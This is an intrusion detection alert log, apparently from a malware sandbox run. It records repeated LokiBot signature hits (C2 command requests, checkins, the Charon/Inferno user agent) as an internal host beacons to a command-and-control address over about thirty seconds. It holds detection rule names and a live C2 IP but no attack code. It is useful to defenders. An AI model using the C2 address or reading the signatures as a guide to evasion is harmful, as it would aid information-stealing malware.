                                              11/25/21-10:53:44.139015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050680192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.584132TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050780192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.584132TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050780192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.584132TCP2025381ET TROJAN LokiBot Checkin5050780192.168.11.20176.223.209.128
                                              11/25/21-10:53:44.584132TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050780192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.050531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050880192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.050531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050880192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.050531TCP2025381ET TROJAN LokiBot Checkin5050880192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.050531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050880192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.484128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15050980192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.484128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5050980192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.484128TCP2025381ET TROJAN LokiBot Checkin5050980192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.484128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25050980192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.998078TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051080192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.998078TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051080192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.998078TCP2025381ET TROJAN LokiBot Checkin5051080192.168.11.20176.223.209.128
                                              11/25/21-10:53:45.998078TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051080192.168.11.20176.223.209.128
                                              11/25/21-10:53:46.507064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051180192.168.11.20176.223.209.128
                                              11/25/21-10:53:46.507064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051180192.168.11.20176.223.209.128
                                              11/25/21-10:53:46.507064TCP2025381ET TROJAN LokiBot Checkin5051180192.168.11.20176.223.209.128
                                              11/25/21-10:53:46.507064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051180192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.023184TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051280192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.023184TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051280192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.023184TCP2025381ET TROJAN LokiBot Checkin5051280192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.023184TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051280192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.499400TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051380192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.499400TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051380192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.499400TCP2025381ET TROJAN LokiBot Checkin5051380192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.499400TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051380192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.998735TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051480192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.998735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051480192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.998735TCP2025381ET TROJAN LokiBot Checkin5051480192.168.11.20176.223.209.128
                                              11/25/21-10:53:47.998735TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051480192.168.11.20176.223.209.128
                                              11/25/21-10:53:48.491253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051580192.168.11.20176.223.209.128
                                              11/25/21-10:53:48.491253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051580192.168.11.20176.223.209.128
                                              11/25/21-10:53:48.491253TCP2025381ET TROJAN LokiBot Checkin5051580192.168.11.20176.223.209.128
                                              11/25/21-10:53:48.491253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051580192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.005088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051680192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.005088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051680192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.005088TCP2025381ET TROJAN LokiBot Checkin5051680192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.005088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051680192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.515577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051780192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.515577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051780192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.515577TCP2025381ET TROJAN LokiBot Checkin5051780192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.515577TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051780192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.999556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051880192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.999556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051880192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.999556TCP2025381ET TROJAN LokiBot Checkin5051880192.168.11.20176.223.209.128
                                              11/25/21-10:53:49.999556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051880192.168.11.20176.223.209.128
                                              11/25/21-10:53:50.513340TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15051980192.168.11.20176.223.209.128
                                              11/25/21-10:53:50.513340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5051980192.168.11.20176.223.209.128
                                              11/25/21-10:53:50.513340TCP2025381ET TROJAN LokiBot Checkin5051980192.168.11.20176.223.209.128
                                              11/25/21-10:53:50.513340TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25051980192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.030415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052080192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.030415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052080192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.030415TCP2025381ET TROJAN LokiBot Checkin5052080192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.030415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052080192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.529676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052180192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.529676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052180192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.529676TCP2025381ET TROJAN LokiBot Checkin5052180192.168.11.20176.223.209.128
                                              11/25/21-10:53:51.529676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052180192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.024613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052280192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.024613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052280192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.024613TCP2025381ET TROJAN LokiBot Checkin5052280192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.024613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052280192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.530324TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052380192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.530324TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052380192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.530324TCP2025381ET TROJAN LokiBot Checkin5052380192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.530324TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052380192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.948310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052480192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.948310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052480192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.948310TCP2025381ET TROJAN LokiBot Checkin5052480192.168.11.20176.223.209.128
                                              11/25/21-10:53:52.948310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052480192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.452600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052580192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.452600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052580192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.452600TCP2025381ET TROJAN LokiBot Checkin5052580192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.452600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052580192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.973666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052680192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.973666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052680192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.973666TCP2025381ET TROJAN LokiBot Checkin5052680192.168.11.20176.223.209.128
                                              11/25/21-10:53:53.973666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052680192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.486840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052780192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.486840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052780192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.486840TCP2025381ET TROJAN LokiBot Checkin5052780192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.486840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052780192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.975392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052880192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.975392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052880192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.975392TCP2025381ET TROJAN LokiBot Checkin5052880192.168.11.20176.223.209.128
                                              11/25/21-10:53:54.975392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052880192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.408844TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15052980192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.408844TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5052980192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.408844TCP2025381ET TROJAN LokiBot Checkin5052980192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.408844TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25052980192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.934689TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053080192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.934689TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053080192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.934689TCP2025381ET TROJAN LokiBot Checkin5053080192.168.11.20176.223.209.128
                                              11/25/21-10:53:55.934689TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053080192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.441220TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053180192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.441220TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053180192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.441220TCP2025381ET TROJAN LokiBot Checkin5053180192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.441220TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053180192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.962356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053280192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.962356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053280192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.962356TCP2025381ET TROJAN LokiBot Checkin5053280192.168.11.20176.223.209.128
                                              11/25/21-10:53:56.962356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053280192.168.11.20176.223.209.128
                                              11/25/21-10:53:57.518580TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053380192.168.11.20176.223.209.128
                                              11/25/21-10:53:57.518580TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053380192.168.11.20176.223.209.128
                                              11/25/21-10:53:57.518580TCP2025381ET TROJAN LokiBot Checkin5053380192.168.11.20176.223.209.128
                                              11/25/21-10:53:57.518580TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053380192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.021953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053480192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.021953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053480192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.021953TCP2025381ET TROJAN LokiBot Checkin5053480192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.021953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053480192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.510118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053580192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.510118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053580192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.510118TCP2025381ET TROJAN LokiBot Checkin5053580192.168.11.20176.223.209.128
                                              11/25/21-10:53:58.510118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053580192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.032652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053680192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.032652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053680192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.032652TCP2025381ET TROJAN LokiBot Checkin5053680192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.032652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053680192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.532045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053780192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.532045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053780192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.532045TCP2025381ET TROJAN LokiBot Checkin5053780192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.532045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053780192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.984023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053880192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.984023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053880192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.984023TCP2025381ET TROJAN LokiBot Checkin5053880192.168.11.20176.223.209.128
                                              11/25/21-10:53:59.984023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053880192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.499476TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15053980192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.499476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5053980192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.499476TCP2025381ET TROJAN LokiBot Checkin5053980192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.499476TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25053980192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.994605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054080192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.994605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054080192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.994605TCP2025381ET TROJAN LokiBot Checkin5054080192.168.11.20176.223.209.128
                                              11/25/21-10:54:00.994605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054080192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.467670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054180192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.467670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054180192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.467670TCP2025381ET TROJAN LokiBot Checkin5054180192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.467670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054180192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.962781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054280192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.962781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054280192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.962781TCP2025381ET TROJAN LokiBot Checkin5054280192.168.11.20176.223.209.128
                                              11/25/21-10:54:01.962781TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054280192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.473185TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054380192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.473185TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054380192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.473185TCP2025381ET TROJAN LokiBot Checkin5054380192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.473185TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054380192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.999053TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054480192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.999053TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054480192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.999053TCP2025381ET TROJAN LokiBot Checkin5054480192.168.11.20176.223.209.128
                                              11/25/21-10:54:02.999053TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054480192.168.11.20176.223.209.128
                                              11/25/21-10:54:03.513999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054580192.168.11.20176.223.209.128
                                              11/25/21-10:54:03.513999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054580192.168.11.20176.223.209.128
                                              11/25/21-10:54:03.513999TCP2025381ET TROJAN LokiBot Checkin5054580192.168.11.20176.223.209.128
                                              11/25/21-10:54:03.513999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054580192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.015227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054680192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.015227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054680192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.015227TCP2025381ET TROJAN LokiBot Checkin5054680192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.015227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054680192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.523263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054780192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.523263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054780192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.523263TCP2025381ET TROJAN LokiBot Checkin5054780192.168.11.20176.223.209.128
                                              11/25/21-10:54:04.523263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054780192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.030326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054880192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.030326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054880192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.030326TCP2025381ET TROJAN LokiBot Checkin5054880192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.030326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054880192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.501409TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15054980192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.501409TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5054980192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.501409TCP2025381ET TROJAN LokiBot Checkin5054980192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.501409TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25054980192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.963027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055380192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.963027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055380192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.963027TCP2025381ET TROJAN LokiBot Checkin5055380192.168.11.20176.223.209.128
                                              11/25/21-10:54:05.963027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055380192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.473005TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055480192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.473005TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055480192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.473005TCP2025381ET TROJAN LokiBot Checkin5055480192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.473005TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055480192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.918600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055580192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.918600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055580192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.918600TCP2025381ET TROJAN LokiBot Checkin5055580192.168.11.20176.223.209.128
                                              11/25/21-10:54:06.918600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055580192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.389479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055680192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.389479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055680192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.389479TCP2025381ET TROJAN LokiBot Checkin5055680192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.389479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055680192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.893918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055780192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.893918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055780192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.893918TCP2025381ET TROJAN LokiBot Checkin5055780192.168.11.20176.223.209.128
                                              11/25/21-10:54:07.893918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055780192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.406130TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055880192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.406130TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055880192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.406130TCP2025381ET TROJAN LokiBot Checkin5055880192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.406130TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055880192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.906488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15055980192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.906488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5055980192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.906488TCP2025381ET TROJAN LokiBot Checkin5055980192.168.11.20176.223.209.128
                                              11/25/21-10:54:08.906488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25055980192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.414303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056080192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.414303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056080192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.414303TCP2025381ET TROJAN LokiBot Checkin5056080192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.414303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056080192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.910267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056180192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.910267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056180192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.910267TCP2025381ET TROJAN LokiBot Checkin5056180192.168.11.20176.223.209.128
                                              11/25/21-10:54:09.910267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056180192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.396251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056280192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.396251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056280192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.396251TCP2025381ET TROJAN LokiBot Checkin5056280192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.396251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056280192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.902123TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056380192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.902123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056380192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.902123TCP2025381ET TROJAN LokiBot Checkin5056380192.168.11.20176.223.209.128
                                              11/25/21-10:54:10.902123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056380192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.424071TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056480192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.424071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056480192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.424071TCP2025381ET TROJAN LokiBot Checkin5056480192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.424071TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056480192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.949253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056580192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.949253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056580192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.949253TCP2025381ET TROJAN LokiBot Checkin5056580192.168.11.20176.223.209.128
                                              11/25/21-10:54:11.949253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056580192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.442910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056680192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.442910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056680192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.442910TCP2025381ET TROJAN LokiBot Checkin5056680192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.442910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056680192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.904803TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15056780192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.904803TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5056780192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.904803TCP2025381ET TROJAN LokiBot Checkin5056780192.168.11.20176.223.209.128
                                              11/25/21-10:54:12.904803TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25056780192.168.11.20176.223.209.128
